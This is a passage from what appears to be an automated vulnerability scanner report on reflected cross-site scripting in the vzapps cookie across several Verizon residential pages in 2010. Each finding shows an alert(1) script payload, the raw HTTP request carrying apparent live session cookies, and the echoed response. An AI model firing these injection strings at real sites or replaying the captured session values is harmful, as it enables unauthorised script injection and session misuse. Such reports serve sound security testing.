Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:30:49 GMT; path=/
Set-Cookie: ContextInfo_State=TXb9b1b'><script>alert(1)</script>6c8f4a2f9aa; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:30:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:30:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:30:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB9B1B'><SCRIPT>ALERT(1)</SCRIPT>6C8F4A2F9AA ' />
...[SNIP]...

1.172. http://www22.verizon.com/residential/bundles/landing/fios_online_nat.html [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/landing/fios_online_nat.html

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 36e1f<script>alert(1)</script>1fa66ada761 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/landing/fios_online_nat.html HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX36e1f<script>alert(1)</script>1fa66ada761; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 67912
Expires: Sat, 20 Nov 2010 02:30:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:30:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:30:51 GMT; path=/
Set-Cookie: ContextInfo_LoginStatus=; expires=Fri, 19-Nov-2010 02:30:51 GMT; path=/
Set-Cookie: ContextInfo_ZipCode=; expires=Fri, 19-Nov-2010 02:30:51 GMT; path=/
Set-Cookie: ContextInfo_Partner=; expires=Fri, 19-Nov-2010 02:30:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX36e1f<script>alert(1)</script>1fa66ada761; path=/
Set-Cookie: ContextInfo_ZipCode=-; path=/
Set-Cookie: ContextInfo_LoginStatus=LoggedOut; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:30:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:30:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:30:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="head"><meta name="robots" content="noindex,follow">
<!--<link href="/co
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX36E1F<SCRIPT>ALERT(1)</SCRIPT>1FA66ADA761 </DIV>
...[SNIP]...

1.173. http://www22.verizon.com/residential/bundles/overview [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8ca98<script>alert(1)</script>beacedae802 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/bundles/overview
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vzapps=STATE=TX8ca98<script>alert(1)</script>beacedae802; ContextInfo_LoopQual=; RVServiceLocation=TX; Source=Internet; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HomePhone/; CP=null*; ContextInfo_State=TX

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112505
Expires: Sat, 20 Nov 2010 01:42:22 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:22 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX8ca98<script>alert(1)</script>beacedae802; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:22 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:22 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8CA98<SCRIPT>ALERT(1)</SCRIPT>BEACEDAE802 </DIV>
...[SNIP]...

1.174. http://www22.verizon.com/residential/bundles/overview [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b72a1'><script>alert(1)</script>7fdd09743c0 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/residential/bundles/overview
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ak-sf=false; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; V347=0; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; VZGEO=west; vzAppID=; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; lob=dotcom; myservices=vzdock=N; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; AimsChatURL_Cookie=https://collaborateext.verizon.com; PageTitle=Livechat; vzapps=STATE=TXb72a1'><script>alert(1)</script>7fdd09743c0; ContextInfo_LoopQual=; RVServiceLocation=TX; Source=Internet; CMS_TimeZoneOffset=360; refURL=http://www22.verizon.com/Residential/HomePhone/; CP=null*; ContextInfo_State=TX

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112509
Expires: Sat, 20 Nov 2010 01:42:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 01:42:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 01:42:21 GMT; path=/
Set-Cookie: ContextInfo_State=TXb72a1'><script>alert(1)</script>7fdd09743c0; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 01:42:21 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB72A1'><SCRIPT>ALERT(1)</SCRIPT>7FDD09743C0 ' />
...[SNIP]...

1.175. http://www22.verizon.com/residential/bundles/standardBundles [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/standardBundles

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7368b'><script>alert(1)</script>b46fea3d253 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/standardBundles HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX7368b'><script>alert(1)</script>b46fea3d253; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 111353
Expires: Sat, 20 Nov 2010 02:31:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:31:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:31:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX7368b'><script>alert(1)</script>b46fea3d253; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:41 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX7368B'><SCRIPT>ALERT(1)</SCRIPT>B46FEA3D253 ' />
...[SNIP]...

1.176. http://www22.verizon.com/residential/bundles/standardBundles [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/bundles/standardBundles

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 8433f<script>alert(1)</script>f7bb2ecc4fa was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/standardBundles HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX8433f<script>alert(1)</script>f7bb2ecc4fa; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 111349
Expires: Sat, 20 Nov 2010 02:31:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:31:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:31:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX8433f<script>alert(1)</script>f7bb2ecc4fa; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:31:43 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX8433F<SCRIPT>ALERT(1)</SCRIPT>F7BB2ECC4FA </DIV>
...[SNIP]...

1.177. http://www22.verizon.com/residential/fiosinternet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiosinternet

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload edaba<script>alert(1)</script>6ae0945e4dc was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiosinternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TXedaba<script>alert(1)</script>6ae0945e4dc; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119100
Expires: Sat, 20 Nov 2010 02:34:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/
Set-Cookie: ContextInfo_State=TXedaba<script>alert(1)</script>6ae0945e4dc; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXEDABA<SCRIPT>ALERT(1)</SCRIPT>6AE0945E4DC </DIV>
...[SNIP]...

1.178. http://www22.verizon.com/residential/fiosinternet [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiosinternet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 76fe5'><script>alert(1)</script>3b33fa14b71 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiosinternet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX76fe5'><script>alert(1)</script>3b33fa14b71; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119104
Expires: Sat, 20 Nov 2010 02:34:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:34:51 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX76fe5'><script>alert(1)</script>3b33fa14b71; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/
Set-Cookie: ContextInfo_State=TX; expires=Fri, 19-Nov-2010 02:34:51 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX76FE5'><SCRIPT>ALERT(1)</SCRIPT>3B33FA14B71 ' />
...[SNIP]...

1.179. http://www22.verizon.com/residential/fiostv [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/residential/fiostv

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7d0c5'><script>alert(1)</script>43771b3ed61 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/fiostv HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AimsChatURL_Cookie=https://collaborateext.verizon.com; ContextInfo_LoopQual=; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; ASPSESSIONIDAASCDDSA=AMLODODCAHPOLKFNKLMMJDCI; RVServiceLocation=TX; refURL=http://www22.verizon.com/residential/bundles/overview#; ASPSESSIONIDCAQADCTB=PGANHBHDNPJFAIJNKAPFDFDH; AIMSPRESESSIONIDSIT=b0fSMnlh2F6rplqPnctyFnvJpZDYjpP4klp2cs58KlQcZdp34GLp!-1715131945!-1272131215; lob=dotcom; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69545525d5f4f58455e445a4a42366a; V347=0; VZGEO=west; ASP.NET_SessionId=kc2rmnitgge3vp55akjq0i45; ak-sf=false; RegistrationApp=SessionId=293e47b8-02f1-4184-8a59-1a5fb423293a; CMS_TimeZoneOffset=360; vzapps=STATE=TX7d0c5'><script>alert(1)</script>43771b3ed61; PageTitle=Livechat; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; ContextInfo_State=TX; Source=Internet; vzAppID=; myservices=vzdock=N; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6ca45525d5f4f58455e445a4a423660; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110626
